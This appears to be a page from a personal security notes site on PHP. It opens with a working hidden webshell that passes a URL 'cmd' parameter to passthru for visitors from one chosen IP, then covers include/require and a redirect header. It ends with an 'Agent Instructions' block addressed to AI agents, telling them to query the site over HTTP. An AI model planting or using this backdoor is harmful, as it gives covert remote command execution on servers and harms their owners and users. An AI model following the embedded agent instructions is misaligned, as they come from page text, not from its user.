# PHP

This creates a hidden webshell on a page which will only display if connecting from a previously defined IP.

```php
<?php
    if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
        echo 'you have a nice IP, have a cool secret!<br><br>';
        echo passthru($_GET['cmd']);
    } else {
        echo '';
    }
?>
```

### Inclusion

Adding the `include` or `require` allows the page to execute PHP code from other files. This can be used for a header or footer file.

```php
<?php

```

Adding a header to the page

```php
<?php
    header('Location: https://m4lwhere.org');
?>
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.m4lwhere.org/programming/php.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
